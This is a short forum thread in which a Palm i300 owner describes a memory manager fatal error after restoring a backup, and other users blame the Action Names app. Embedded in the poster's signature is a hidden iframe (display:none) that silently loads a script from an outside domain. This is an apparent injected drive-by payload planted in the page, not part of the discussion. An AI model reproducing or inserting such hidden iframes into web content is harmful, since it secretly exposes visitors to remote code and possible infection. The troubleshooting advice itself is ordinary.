+ Reply to Thread

Memory manager error Fatal Alert

I have had my i300 for 6 months and love it. I recently had a problem with the unit doing some wierd flashing of the Palm startup screen and my only recourse was to do a hard reset. When I did a resynch and backup restore and restarted the unit, it came up with a message that said "Udating files" at that point it said "Fatal Error" Memory manager, line ...

I went back and did another hard reset and put my backup folder aside and all was well. I have since reinstalled most of the programs I had on there except for Action Names and Handscape. I am wondering if either of these programs were the culprit or was it just that I was backuping up and restoring too many files at once?

Sorry for the long winded story. Any programs (Launcher types or Names, etc that are better than the Handscape or Action Names?

Thanks

Peter
    pwc@itsa.ucsf.edu<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Peter

Napoleon Bonaparte Jr.

Hello

Its one of the reasons , why I do not use "Action Names" .

It cannot work with most of aplications .

"Action Names" monopolizing the phone .

But its very good programm and , probably , it will

work fine with any new phone model we,ll get soon ...

Administrator

Arrow

action names has been know to cause injury to the i300, as well as countless others. its good that you moved the backup folder and manually installed apps.. thats always the best way to go in finding the culprit.

IIRC, there isa thread here that discussed which apps caused problems over others...